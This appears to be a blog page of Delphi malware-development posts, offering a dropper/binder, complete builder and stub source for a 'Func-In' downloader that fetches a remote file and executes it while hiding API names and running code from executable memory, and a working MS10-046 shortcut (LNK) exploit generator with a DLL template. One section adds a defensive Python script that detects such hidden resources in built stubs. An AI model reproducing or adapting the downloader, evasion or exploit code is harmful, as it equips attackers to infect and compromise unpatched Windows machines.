posted 19 Jul 2011 15:20 by Delphi Basics
[updated 28 Jul 2011 11:39]
This Delphi source code details a dropper/binder written by Voik.
Version 0.1
- Func-in method
- Many anti-debugging tricks
- Stub generated at run time
- Pure ASM stub
- Very nice GUI
Not working:
- Icons
Version 0.2
+ Added icon support
+ Added execute in browser memory
+ GUI improved
+ Some bugs fixed and code optimised
Author: Voik
Compiled: Delphi 2007
Operating System: Windows Vista
Only Delphi source code is included in the archive. |
posted 24 Dec 2010 08:22 by Delphi Basics
This Delphi source code example details the WinInet downloader, edited to use the Func-In technique: the procedure that downloads and executes a file is stored in the resource section of the stub application, from where it is loaded and called when a built stub is executed.
Builder:
program Builder;
//delphibasics.info & ic0de.org
//Authors: cswi, abhe & steve10120
const
kernel32 = 'kernel32.dll';
type
PByte = ^Byte;
function BeginUpdateResourceW(pFileName: PWideChar; bDeleteExistingResources: Boolean): Cardinal; stdcall; external kernel32 name 'BeginUpdateResourceW';
function UpdateResourceW(hUpdate: Cardinal; lpType, lpName: PWideChar; wLanguage: Word; lpData: Pointer; cbData: LongWord): Boolean; stdcall; external kernel32 name 'UpdateResourceW';
function EndUpdateResourceW(hUpdate: Cardinal; fDiscard: Boolean): Boolean; stdcall; external kernel32 name 'EndUpdateResourceW';
const
cFuncIn : PWideChar = 'FUNCIN';
type
TGetProcAddress = function (hModule: Cardinal; lpProcName: pAnsiChar): Pointer; stdcall;
TLoadLibraryA = function(lpLibFileName: PAnsiChar): Cardinal; stdcall;
TFuncInRecord = Record
xGetProcAddress : TGetProcAddress;
xLoadLibraryA : TLoadLibraryA;
end;
PFuncInRecord = ^TFuncInRecord;
procedure FuncIn(AFuncInRecord : PFuncInRecord; cUrl, cFile : pAnsiChar);
type
PSecurityAttributes = ^TSecurityAttributes;
TSecurityAttributes = record
nLength: LongWord;
lpSecurityDescriptor: Pointer;
bInheritHandle: Boolean;
end;
POverlapped = ^TOverlapped;
TOverlapped = record
Internal: LongWord;
InternalHigh: LongWord;
Offset: LongWord;
OffsetHigh: LongWord;
hEvent: LongWord;
end;
TCreateFileA = function(lpFileName: PAnsiChar; dwDesiredAccess, dwShareMode: LongWord; lpSecurityAttributes: PSecurityAttributes; dwCreationDisposition, dwFlagsAndAttributes: LongWord; hTemplateFile: LongWord): LongWord; stdcall;
TWriteFile = function(hFile: LongWord; const Buffer; nNumberOfBytesToWrite: LongWord; var lpNumberOfBytesWritten: LongWord; lpOverlapped: POverlapped): Boolean; stdcall;
TCloseHandle = function(hObject: LongWord): Boolean; stdcall;
TInternetOpenA = function(lpszAgent: PAnsiChar; dwAccessType: LongWord; lpszProxy, lpszProxyBypass: PAnsiChar; dwFlags: LongWord): Pointer; stdcall;
TInternetOpenUrlA = function(hInet: Pointer; lpszUrl: PAnsiChar; lpszHeaders: PAnsiChar; dwHeadersLength: LongWord; dwFlags: LongWord; dwContext: LongWord): Pointer; stdcall;
TInternetReadFile = function(hFile: Pointer; lpBuffer: Pointer; dwNumberOfBytesToRead: LongWord; var lpdwNumberOfBytesRead: LongWord): Boolean; stdcall;
TInternetCloseHandle = function(hInet: Pointer): Boolean; stdcall;
TShellExecuteA = function(hWnd: LongWord; Operation, FileName, Parameters, Directory: PAnsiChar; ShowCmd: Integer): LongWord; stdcall;
var
szKernel32 : array [0..8] of AnsiChar;
szWininet : array [0..7] of AnsiChar;
szShell32 : array [0..7] of AnsiChar;
szCreateFileA : array [0..11] of AnsiChar;
szWriteFile : array [0..9] of AnsiChar;
szCloseHandle : array [0..11] of AnsiChar;
szInternetOpenA : array [0..13] of AnsiChar;
szInternetOpenUrlA : array [0..16] of AnsiChar;
szInternetReadFile : array [0..16] of AnsiChar;
szInternetCloseHandle : array [0..19] of AnsiChar;
szShellExecuteA : array [0..13] of AnsiChar;
szopen : array [0..4] of AnsiChar;
xCreateFileA : TCreateFileA;
xWriteFile : TWriteFile;
xCloseHandle : TCloseHandle;
xInternetOpenA : TInternetOpenA;
xInternetOpenUrlA : TInternetOpenUrlA;
xInternetReadFile : TInternetReadFile;
xInternetCloseHandle : TInternetCloseHandle;
xShellExecuteA : TShellExecuteA;
hKernel32, hWininet, hShell32 : LongWord;
hSession, hURL: Pointer;
Buffer: Array [1..1024] of Byte;
BufferLen, FileHandle, BytesWritten: LongWord;
begin
szKernel32[0] := 'K'; szKernel32[1] := 'e'; szKernel32[2] := 'r'; szKernel32[3] := 'n'; szKernel32[4] := 'e'; szKernel32[5] := 'l'; szKernel32[6] := '3'; szKernel32[7] := '2'; szKernel32[8] := #0;
szWininet[0] := 'W'; szWininet[1] := 'i'; szWininet[2] := 'n'; szWininet[3] := 'i'; szWininet[4] := 'n'; szWininet[5] := 'e'; szWininet[6] := 't'; szWininet[7] := #0;
szShell32[0] := 'S'; szShell32[1] := 'h'; szShell32[2] := 'e'; szShell32[3] := 'l'; szShell32[4] := 'l'; szShell32[5] := '3'; szShell32[6] := '2'; szShell32[7] := #0;
szCreateFileA[0] := 'C'; szCreateFileA[1] := 'r'; szCreateFileA[2] := 'e'; szCreateFileA[3] := 'a'; szCreateFileA[4] := 't'; szCreateFileA[5] := 'e'; szCreateFileA[6] := 'F'; szCreateFileA[7] := 'i'; szCreateFileA[8] := 'l'; szCreateFileA[9] := 'e'; szCreateFileA[10] := 'A'; szCreateFileA[11] := #0;
szWriteFile[0] := 'W'; szWriteFile[1] := 'r'; szWriteFile[2] := 'i'; szWriteFile[3] := 't'; szWriteFile[4] := 'e'; szWriteFile[5] := 'F'; szWriteFile[6] := 'i'; szWriteFile[7] := 'l'; szWriteFile[8] := 'e'; szWriteFile[9] := #0;
szCloseHandle[0] := 'C'; szCloseHandle[1] := 'l'; szCloseHandle[2] := 'o'; szCloseHandle[3] := 's'; szCloseHandle[4] := 'e'; szCloseHandle[5] := 'H'; szCloseHandle[6] := 'a'; szCloseHandle[7] := 'n'; szCloseHandle[8] := 'd'; szCloseHandle[9] := 'l'; szCloseHandle[10] := 'e'; szCloseHandle[11] := #0;
szInternetOpenA[0] := 'I'; szInternetOpenA[1] := 'n'; szInternetOpenA[2] := 't'; szInternetOpenA[3] := 'e'; szInternetOpenA[4] := 'r'; szInternetOpenA[5] := 'n'; szInternetOpenA[6] := 'e'; szInternetOpenA[7] := 't'; szInternetOpenA[8] := 'O'; szInternetOpenA[9] := 'p'; szInternetOpenA[10] := 'e'; szInternetOpenA[11] := 'n'; szInternetOpenA[12] := 'A'; szInternetOpenA[13] := #0;
szInternetOpenUrlA[0] := 'I'; szInternetOpenUrlA[1] := 'n'; szInternetOpenUrlA[2] := 't'; szInternetOpenUrlA[3] := 'e'; szInternetOpenUrlA[4] := 'r'; szInternetOpenUrlA[5] := 'n'; szInternetOpenUrlA[6] := 'e'; szInternetOpenUrlA[7] := 't'; szInternetOpenUrlA[8] := 'O'; szInternetOpenUrlA[9] := 'p'; szInternetOpenUrlA[10] := 'e'; szInternetOpenUrlA[11] := 'n'; szInternetOpenUrlA[12] := 'U'; szInternetOpenUrlA[13] := 'r'; szInternetOpenUrlA[14] := 'l'; szInternetOpenUrlA[15] := 'A'; szInternetOpenUrlA[16] := #0;
szInternetReadFile[0] := 'I'; szInternetReadFile[1] := 'n'; szInternetReadFile[2] := 't'; szInternetReadFile[3] := 'e'; szInternetReadFile[4] := 'r'; szInternetReadFile[5] := 'n'; szInternetReadFile[6] := 'e'; szInternetReadFile[7] := 't'; szInternetReadFile[8] := 'R'; szInternetReadFile[9] := 'e'; szInternetReadFile[10] := 'a'; szInternetReadFile[11] := 'd'; szInternetReadFile[12] := 'F'; szInternetReadFile[13] := 'i'; szInternetReadFile[14] := 'l'; szInternetReadFile[15] := 'e'; szInternetReadFile[16] := #0;
szInternetCloseHandle[0] := 'I'; szInternetCloseHandle[1] := 'n'; szInternetCloseHandle[2] := 't'; szInternetCloseHandle[3] := 'e'; szInternetCloseHandle[4] := 'r'; szInternetCloseHandle[5] := 'n'; szInternetCloseHandle[6] := 'e'; szInternetCloseHandle[7] := 't'; szInternetCloseHandle[8] := 'C'; szInternetCloseHandle[9] := 'l'; szInternetCloseHandle[10] := 'o'; szInternetCloseHandle[11] := 's'; szInternetCloseHandle[12] := 'e'; szInternetCloseHandle[13] := 'H'; szInternetCloseHandle[14] := 'a'; szInternetCloseHandle[15] := 'n'; szInternetCloseHandle[16] := 'd'; szInternetCloseHandle[17] := 'l'; szInternetCloseHandle[18] := 'e'; szInternetCloseHandle[19] := #0;
szShellExecuteA[0] := 'S'; szShellExecuteA[1] := 'h'; szShellExecuteA[2] := 'e'; szShellExecuteA[3] := 'l'; szShellExecuteA[4] := 'l'; szShellExecuteA[5] := 'E'; szShellExecuteA[6] := 'x'; szShellExecuteA[7] := 'e'; szShellExecuteA[8] := 'c'; szShellExecuteA[9] := 'u'; szShellExecuteA[10] := 't'; szShellExecuteA[11] := 'e'; szShellExecuteA[12] := 'A'; szShellExecuteA[13] := #0;
szopen[0] := 'o'; szopen[1] := 'p'; szopen[2] := 'e'; szopen[3] := 'n'; szopen[4] := #0;
with AFuncInRecord^ do
begin
hKernel32 := xLoadLibraryA(szKernel32);
@xCreateFileA := xGetProcAddress(hKernel32, szCreateFileA);
@xWriteFile := xGetProcAddress(hKernel32, szWriteFile);
@xCloseHandle := xGetProcAddress(hKernel32, szCloseHandle);
hWininet := xLoadLibraryA(szWininet);
@xInternetOpenA := xGetProcAddress(hWininet, szInternetOpenA);
@xInternetOpenUrlA := xGetProcAddress(hWininet, szInternetOpenUrlA);
@xInternetReadFile := xGetProcAddress(hWininet, szInternetReadFile);
@xInternetCloseHandle := xGetProcAddress(hWininet, szInternetCloseHandle);
hShell32 := xLoadLibraryA(szShell32);
@xShellExecuteA := xGetProcAddress(hShell32, szShellExecuteA);
hSession := xInternetOpenA(nil, 0, nil, nil, 0);
hURL := xInternetOpenURLA(hSession, cURL, nil, 0, 0, 0);
FileHandle := xCreateFileA(cFile, $40000000, $00000002, nil, 2, $00000002, 0);
BytesWritten := 0;
repeat
xInternetReadFile(hURL, @Buffer, SizeOf(Buffer), BufferLen);
xWriteFile(FileHandle, Buffer, BufferLen, BytesWritten, nil);
until BufferLen = 0;
xCloseHandle(FileHandle);
xInternetCloseHandle(hURL);
xInternetCloseHandle(hSession);
xShellExecuteA(0, szopen, cFile, nil, nil, 1);
end;
end;
Function WriteResData(pFile: pointer; Size: integer; pwName: pWideChar):Boolean;
const
pwServerFile : PWideChar = 'Stub.exe' ;
var
hResourceHandle: Cardinal;
begin
hResourceHandle := BeginUpdateResourceW(pwServerFile, False);
Result := UpdateResourceW(hResourceHandle, PWideChar(10), pwName, 0, pFile, Size); // type 10 = RT_RCDATA
EndUpdateResourceW(hResourceHandle, False);
end;
function SizeOfProc(pAddr: pointer): Cardinal;
var dwSize: Cardinal;
begin
dwSize := 0;
repeat
inc(dwSize);
until PByte(Cardinal(pAddr)+dwSize-1)^ = $C3;
Result := dwSize;
end;
begin
WriteResData(@FuncIn, SizeOfProc(@FuncIn), cFuncIn);
WriteResData(nil, 0, 'PACKAGEINFO');
WriteResData(nil, 0, 'DVCLAL');
end.
Stub:
program Stub;
const
cURL : PAnsiChar = 'http://www.google.co.za/intl/en_com/images/srpr/logo1w.png';
cFile : PAnsiChar = 'C:\GoogleLogo.png';
const
kernel32 = 'kernel32.dll';
MEM_COMMIT = $1000;
PAGE_EXECUTE_READWRITE = $40;
MEM_RELEASE = $8000;
function GetProcAddress(hModule: Cardinal; lpProcName: PAnsiChar): Pointer; stdcall; external kernel32 name 'GetProcAddress';
function LoadLibraryA(lpLibFileName: PAnsiChar): Cardinal; stdcall; external kernel32 name 'LoadLibraryA';
function FindResourceW(hModule: Cardinal; lpName, lpType: PWideChar): Cardinal; stdcall; external kernel32 name 'FindResourceW';
function LoadResource(hModule: Cardinal; hResInfo: Cardinal): Cardinal; stdcall; external kernel32 name 'LoadResource';
function SizeofResource(hModule: Cardinal; hResInfo: Cardinal): LongWord; stdcall; external kernel32 name 'SizeofResource';
function VirtualAlloc(lpvAddress: Pointer; dwSize, flAllocationType, flProtect: LongWord): Pointer; stdcall; external kernel32 name 'VirtualAlloc';
function VirtualFree(lpAddress: Pointer; dwSize, dwFreeType: LongWord): Boolean; stdcall; external kernel32 name 'VirtualFree';
const
cFuncIn : PWideChar = 'FUNCIN';
type
TGetProcAddress = function (hModule: Cardinal; lpProcName: pAnsiChar): Pointer; stdcall;
TLoadLibraryA = function(lpLibFileName: PAnsiChar): Cardinal; stdcall;
TFuncInRecord = Record
xGetProcAddress : TGetProcAddress;
xLoadLibraryA : TLoadLibraryA;
end;
PFuncInRecord = ^TFuncInRecord;
PFuncIn = ^TFuncIn;
TFuncIn = procedure(pData : PFuncInRecord; cUrl, cFile : pAnsiChar); // same signature as FuncIn in the builder
procedure ResGet(ResName: pwidechar; var data : pointer; var Size:LongWord);
var
ResSrc: Cardinal;
ResGlobal: Cardinal;
begin
ResSrc := FindResourceW(0, ResName, PWideChar(10)); // type 10 = RT_RCDATA
ResGlobal := LoadResource(0, ResSrc);
Data := Pointer(ResGlobal);
Size := SizeofResource(0, ResSrc);
end;
procedure CopyMemory(Destination, Source:Pointer; dwSize:LongWord);
asm
PUSH ECX
PUSH ESI
PUSH EDI
MOV EDI, Destination
MOV ESI, Source
MOV ECX, dwSize
REP MOVSB
POP EDI
POP ESI
POP ECX
end;
var
FuncIn : TFuncIn;
pResource : Pointer;
dwResourceSize : LongWord;
AFuncInRecord : TFuncInRecord;
begin
AFuncInRecord.xGetProcAddress := @GetProcAddress;
AFuncInRecord.xLoadLibraryA := @LoadLibraryA;
ResGet(cFuncIn, pResource, dwResourceSize);
FuncIn := VirtualAlloc(nil, dwResourceSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
CopyMemory(@FuncIn, pResource, dwResourceSize);
FuncIn(@AFuncInRecord,cUrl, cFile);
VirtualFree(@FuncIn, 0, MEM_RELEASE);
end.
|
posted 22 Dec 2010 11:18 by Delphi Basics
[updated 23 Dec 2010 14:39]
The closed source "Func-In" technique was pioneered by p0ke (in Nidhogg Crypter) and shapeless (in Poison Ivy). This recreated, open source Delphi example details how to write a function to the resource section of your stub and then call that function from the resource upon execution. This keeps the size of the final application down, because only the selected functions are written to the stub.
The function has to be self-contained: it receives the addresses of GetProcAddress and LoadLibraryA in a record passed by the stub and resolves every other API through them, and it spells the library and API names out character by character into local arrays, so the compiled bytes contain no references into the builder's own image. The builder measures the function by scanning forward from its entry point for the first $C3 (ret) byte, so a function that contains a $C3 byte anywhere before its real return (as part of an immediate or an address, for instance) is copied incompletely. The stub then copies the resource into memory allocated with PAGE_EXECUTE_READWRITE and calls it there.
Authors: Counterstrikewi, Abhe & Steve10120
Websites: delphibasics.info & ic0de.org
Compiled: Delphi 2007, Delphi XE
Slayer616 created his own func-in technology using shellcode:
Builder:
program Builder;
//delphibasics.info & ic0de.org
//Authors: cswi, abhe & steve10120
const
kernel32 = 'kernel32.dll';
MB_YESNO = 4;
MB_OK = 0;
type
PByte = ^Byte;
function BeginUpdateResourceW(pFileName: PWideChar; bDeleteExistingResources: Boolean): Cardinal; stdcall; external kernel32 name 'BeginUpdateResourceW';
function UpdateResourceW(hUpdate: Cardinal; lpType, lpName: PWideChar; wLanguage: Word; lpData: Pointer; cbData: LongWord): Boolean; stdcall; external kernel32 name 'UpdateResourceW';
function EndUpdateResourceW(hUpdate: Cardinal; fDiscard: Boolean): Boolean; stdcall; external kernel32 name 'EndUpdateResourceW';
const
cFuncIn : PWideChar = 'FUNCIN';
type
TGetProcAddress = function (hModule: Cardinal; lpProcName: pAnsiChar): Pointer; stdcall;
TLoadLibraryA = function(lpLibFileName: PAnsiChar): Cardinal; stdcall;
TFuncInRecord = Record
xGetProcAddress : TGetProcAddress;
xLoadLibraryA : TLoadLibraryA;
end;
PFuncInRecord = ^TFuncInRecord;
procedure FuncIn(AFuncInRecord : PFuncInRecord; lpText, lpCaption : pAnsiChar);
type
TMessageBoxA = function (hWnd: Cardinal; lpText, lpCaption: PAnsiChar; uType: LongWord): LongWord; stdcall;
var
szUser32 : array[0..6] of AnsiChar;
szMessageBoxA : array[0..11] of AnsiChar;
xMessageBoxA : TMessageBoxA;
dwResult : LongWord;
begin
// names are built character by character so the function carries no pointers into the builder image
szUser32[0] := 'U'; szUser32[1] := 's'; szUser32[2] := 'e'; szUser32[3] := 'r'; szUser32[4] := '3'; szUser32[5] := '2'; szUser32[6] := #0;
szMessageBoxA[0] := 'M'; szMessageBoxA[1] := 'e'; szMessageBoxA[2] := 's'; szMessageBoxA[3] := 's'; szMessageBoxA[4] := 'a'; szMessageBoxA[5] := 'g'; szMessageBoxA[6] := 'e'; szMessageBoxA[7] := 'B'; szMessageBoxA[8] := 'o'; szMessageBoxA[9] := 'x'; szMessageBoxA[10] := 'A'; szMessageBoxA[11] := #0;
with AFuncInRecord^ do
begin
@xMessageBoxA := xGetProcAddress(xLoadLibraryA(szUser32), szMessageBoxA);
if Assigned(xMessageBoxA) then
begin
dwResult := xMessageBoxA(0, lpText, lpCaption, MB_YESNO);
if dwResult = 6 then // 6 = IDYES
xMessageBoxA(0, lpText, lpCaption, MB_OK);
end;
end;
end;
Function WriteResData(pFile: pointer; Size: integer; pwName: pWideChar):Boolean;
const
pwServerFile : PWideChar = 'Stub.exe' ;
var
hResourceHandle: Cardinal;
begin
hResourceHandle := BeginUpdateResourceW(pwServerFile, False);
Result := UpdateResourceW(hResourceHandle, PWideChar(10), pwName, 0, pFile, Size); // type 10 = RT_RCDATA
EndUpdateResourceW(hResourceHandle, False);
end;
function SizeOfProc(pAddr: pointer): Cardinal;
var dwSize: Cardinal;
begin
// length = distance from the entry point to the first $C3 (ret) byte
dwSize := 0;
repeat
inc(dwSize);
until PByte(Cardinal(pAddr)+dwSize-1)^ = $C3;
Result := dwSize;
end;
begin
WriteResData(@FuncIn, SizeOfProc(@FuncIn), cFuncIn);
// writing nil data deletes the resource: strip the Delphi-specific resources from the stub
WriteResData(nil, 0, 'PACKAGEINFO');
WriteResData(nil, 0, 'DVCLAL');
end.
Stub:
program Stub;
const
kernel32 = 'kernel32.dll';
MEM_COMMIT = $1000;
PAGE_EXECUTE_READWRITE = $40;
MEM_RELEASE = $8000;
function GetProcAddress(hModule: Cardinal; lpProcName: PAnsiChar): Pointer; stdcall; external kernel32 name 'GetProcAddress';
function LoadLibraryA(lpLibFileName: PAnsiChar): Cardinal; stdcall; external kernel32 name 'LoadLibraryA';
function FindResourceW(hModule: Cardinal; lpName, lpType: PWideChar): Cardinal; stdcall; external kernel32 name 'FindResourceW';
function LoadResource(hModule: Cardinal; hResInfo: Cardinal): Cardinal; stdcall; external kernel32 name 'LoadResource';
function SizeofResource(hModule: Cardinal; hResInfo: Cardinal): LongWord; stdcall; external kernel32 name 'SizeofResource';
function VirtualAlloc(lpvAddress: Pointer; dwSize, flAllocationType, flProtect: LongWord): Pointer; stdcall; external kernel32 name 'VirtualAlloc';
function VirtualFree(lpAddress: Pointer; dwSize, dwFreeType: LongWord): Boolean; stdcall; external kernel32 name 'VirtualFree';
const
cFuncIn : PWideChar = 'FUNCIN';
type
TGetProcAddress = function (hModule: Cardinal; lpProcName: pAnsiChar): Pointer; stdcall;
TLoadLibraryA = function(lpLibFileName: PAnsiChar): Cardinal; stdcall;
TFuncInRecord = Record
xGetProcAddress : TGetProcAddress;
xLoadLibraryA : TLoadLibraryA;
end;
PFuncInRecord = ^TFuncInRecord;
PFuncIn = ^TFuncIn;
TFuncIn = procedure(pData : PFuncInRecord; lpTitle, lpMessage : pAnsiChar);
procedure ResGet(ResName: pwidechar; var data : pointer; var Size:LongWord);
var
ResSrc: Cardinal;
ResGlobal: Cardinal;
begin
ResSrc := FindResourceW(0, ResName, PWideChar(10)); // type 10 = RT_RCDATA
ResGlobal := LoadResource(0, ResSrc);
Data := Pointer(ResGlobal);
Size := SizeofResource(0, ResSrc);
end;
procedure CopyMemory(Destination, Source:Pointer; dwSize:LongWord);
asm
PUSH ECX
PUSH ESI
PUSH EDI
MOV EDI, Destination
MOV ESI, Source
MOV ECX, dwSize
REP MOVSB
POP EDI
POP ESI
POP ECX
end;
var
FuncIn : TFuncIn;
pResource : Pointer;
dwResourceSize : LongWord;
AFuncInRecord : TFuncInRecord;
begin
AFuncInRecord.xGetProcAddress := @GetProcAddress;
AFuncInRecord.xLoadLibraryA := @LoadLibraryA;
ResGet(cFuncIn, pResource, dwResourceSize);
FuncIn := VirtualAlloc(nil, dwResourceSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
CopyMemory(@FuncIn, pResource, dwResourceSize);
FuncIn(@AFuncInRecord,'cswi <3 abhe & steve10120', '<3 p0ke');
VirtualFree(@FuncIn, 0, MEM_RELEASE);
end.
|
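The Func-In builders in both posts above store the extracted function as an RT_RCDATA (type 10) resource named FUNCIN inside Stub.exe, and the stub reads it back with FindResourceW/LoadResource. The script below is an added example written for this page (not the posts' own code) that shows how to find such a resource in a built stub from the file alone: it walks the PE resource directory the same way the loader does and flags RCDATA blobs that look like a bare 32-bit function, meaning no file signature, a common prologue at the start and a ret at the end, which is the byte the builder's SizeOfProc scan stops on. The PE and resource builders, the resource names, the prologue byte patterns and the FUNC_BLOB/PNG_BLOB fixtures are all constructed for the example so it runs offline.

```python
import struct

RT_RCDATA = 10                         # the type the page's builder writes (PWideChar(10))
RSRC_RVA, RSRC_RAW = 0x2000, 0x200     # constructed sample: .rsrc RVA and file offset


def build_rsrc(res_name, blob):
    """Constructed fixture (not the page's Builder): a .rsrc body holding one
    RT_RCDATA entry named res_name, laid out root -> type -> name -> language -> data."""
    name16 = res_name.encode("utf-16-le")
    name_off = 88                                     # after 3 directories + data entry
    blob_off = (name_off + 2 + len(name16) + 3) & ~3  # keep the payload 4-byte aligned

    def one_entry_dir(named, ident, target, is_subdir):
        header = struct.pack("<IIHHHH", 0, 0, 0, 0, int(named), int(not named))
        return header + struct.pack("<II", ident | (0x80000000 if named else 0),
                                    target | (0x80000000 if is_subdir else 0))

    body = (one_entry_dir(False, RT_RCDATA, 24, True)   # root: type 10  -> directory at 24
            + one_entry_dir(True, name_off, 48, True)   # type: name     -> directory at 48
            + one_entry_dir(False, 0, 72, False)        # name: language -> data entry at 72
            + struct.pack("<IIII", RSRC_RVA + blob_off, len(blob), 0, 0)
            + struct.pack("<H", len(res_name)) + name16)
    return body.ljust(blob_off, b"\x00") + blob


def build_pe32(rsrc):
    """Constructed fixture: a minimal PE32 (DOS stub, headers, one .rsrc section)."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)           # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)  # i386, one section
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, RSRC_RAW)    # ImageBase, alignments
    struct.pack_into("<II", opt, 56, RSRC_RVA + 0x1000, RSRC_RAW)    # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                              # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * 2, RSRC_RVA, len(rsrc))    # resource data directory
    section = b".rsrc".ljust(8, b"\x00") + struct.pack(
        "<IIIIIIHHI", len(rsrc), RSRC_RVA, len(rsrc), RSRC_RAW, 0, 0, 0, 0, 0x40000040)
    headers = dos + b"PE\x00\x00" + coff + bytes(opt) + section
    return headers.ljust(RSRC_RAW, b"\x00") + rsrc


def rcdata_resources(pe):
    """{name_or_id: bytes} for every RT_RCDATA entry, walked the way FindResourceW does."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE image")
    coff, opt = e_lfanew + 4, e_lfanew + 24
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    data_dirs = opt + (96 if struct.unpack_from("<H", pe, opt)[0] == 0x10B else 112)
    rsrc_rva = struct.unpack_from("<I", pe, data_dirs + 8 * 2)[0]   # IMAGE_DIRECTORY_ENTRY_RESOURCE
    sections = [struct.unpack_from("<IIII", pe, opt + opt_size + 40 * i + 8)   # VirtualSize, VA,
                for i in range(nsections)]                                     # RawSize, RawPtr

    def rva_to_offset(rva):
        for vsize, va, rawsize, raw in sections:
            if va <= rva < va + max(vsize, rawsize):
                return raw + (rva - va)
        raise ValueError("RVA %#x is outside every section" % rva)
    base = rva_to_offset(rsrc_rva)

    def entries(dir_off):          # yields (name_or_id, offset_from_base, is_subdirectory)
        named, by_id = struct.unpack_from("<HH", pe, base + dir_off + 12)
        for i in range(named + by_id):
            ident, target = struct.unpack_from("<II", pe, base + dir_off + 16 + 8 * i)
            if ident & 0x80000000:                                   # IMAGE_RESOURCE_DIR_STRING_U
                s = base + (ident & 0x7FFFFFFF)
                n = struct.unpack_from("<H", pe, s)[0]
                ident = pe[s + 2:s + 2 + 2 * n].decode("utf-16-le")
            yield ident, target & 0x7FFFFFFF, bool(target & 0x80000000)

    found = {}
    for type_id, type_dir, t_is_dir in entries(0):
        if type_id != RT_RCDATA or not t_is_dir:
            continue
        for name, name_dir, n_is_dir in entries(type_dir):
            for _lang, data_entry, l_is_dir in (entries(name_dir) if n_is_dir else ()):
                if not l_is_dir:
                    rva, size = struct.unpack_from("<II", pe, base + data_entry)
                    found[name] = pe[rva_to_offset(rva):rva_to_offset(rva) + size]
                    break
    return found


X86_PROLOGUES = (b"\x55\x8b\xec", b"\x55\x89\xe5", b"\x53\x56\x57", b"\x83\xec", b"\x81\xec")


def looks_like_raw_function(blob):
    """Triage rule for a Func-In payload: no file signature, a common 32-bit prologue
    up front and a ret (C3 or C2 imm16) at the very end, the byte SizeOfProc stops on."""
    if len(blob) < 8 or blob[:2] in (b"MZ", b"PK", b"\x89P"):
        return False
    opens_like_code = any(blob.startswith(p) for p in X86_PROLOGUES)
    ends_on_ret = blob.endswith(b"\xc3") or (len(blob) >= 3 and blob[-3] == 0xC2)
    return opens_like_code and ends_on_ret


def suspicious_rcdata(pe):
    """Names of RT_RCDATA resources in pe that look like a bare function image."""
    return [n for n, b in rcdata_resources(pe).items() if looks_like_raw_function(b)]


# Constructed fixtures: a Delphi-shaped function image (prologue, body, epilogue, ret)
# standing in for what the page's builder copies out, and an ordinary PNG header.
FUNC_BLOB = bytes.fromhex("558bec83c4f8535657" + "8b7d088b750c" * 3 + "5f5e5b8be55dc3")
PNG_BLOB = bytes.fromhex("89504e470d0a1a0a0000000d49484452")
SAMPLE_STUB = build_pe32(build_rsrc("FUNCIN", FUNC_BLOB))
SAMPLE_CLEAN = build_pe32(build_rsrc("LOGO", PNG_BLOB))
```

suspicious_rcdata(SAMPLE_STUB) returns ['FUNCIN'] and the PNG sample returns an empty list. The prologue list covers what Delphi and common C compilers emit for a function with a stack frame; a frameless leaf function or a blob with padding after the ret would slip past, so treat a hit as something to look at rather than a verdict, and pair it with the run-time tell the stub itself exhibits: a freshly VirtualAlloc'd PAGE_EXECUTE_READWRITE region that is called immediately after a copy from the image's own resource section.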
posted 9 Dec 2010 15:16 by Delphi Basics
This code details the MS10-046 'CPL Lnk Exploit' (CVE-2010-2568, the Windows Shell shortcut icon-loading vulnerability) in Delphi.
Cpl Lnk Vulnerability - MS10-046 in Delphi
Author: Paray_Vx
Tested and working on Windows XP, Windows Vista and Windows 7
program MS10046;
uses SysUtils, Windows;
procedure CplLnkExploit(location:string); const // ShellCode Lnk Vulnerability Sizelnk :integer = 141; ShellCode : ARRAY [1..141] OF Byte = ( $4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00,$46,$81,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$01, $00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$36,$01,$14,$00,$1F,$50,$E0,$4F,$D0,$20,$EA,$3A,$69,$10,$A2,$D8,$08,$00,$2B,$30,$30,$9D,$14,$00,$2E,$1E,$20,$20,$EC,$21,$EA,$3A,$69,$10,$A2,$DD,$08,$00,$2B,$30,$30,$9D,$0C,$01,$00,$00,$00, $00,$00,$00,$00,$00,$00,$00,$00,$6A,$00,$00,$00,$00,$00,$00,$20,$00,$3A);
// ~ Your Dll Here ~ Ex : 'C:\MS10046.dll' SizeNameDll : integer = 28; Dllx : ARRAY [1..28] OF Byte = ($00,$43,$00,$3A,$00,$5C,$00,$4D,$00,$53,$00,$31,$00,$30,$00,$30,$00,$34,$00,$36,$00,$2E,$00,$64,$00,$6C,$00,$6C);
var
one : file;
i : integer;
begin
AssignFile(one,location);
Rewrite(one,1);
for i:=1 to Sizelnk do
begin
BlockWrite(one,ShellCode[i],1);
end;
for i:=1 to SizeNameDll do
begin
BlockWrite(one,Dllx[i],1);
end;
CloseFile(one);
end;
begin
MessageBoxA(0,'CPL Lnk Exploit Built!', 'MS10-046', MB_OK);
// Extract here
CplLnkExploit('C:\MS10-046.lnk');
end.
Library MS10046;
uses
Windows;
begin
MessageBoxA(0, 'CPL Lnk Exploit Success!', 'MS10-046', MB_ICONWARNING);
end.
Many PCs are unpatched and vulnerable to this exploit. To protect yourself, patch your OS here:
Read more about the CPL Lnk Vulnerability (MS10-046) here: |
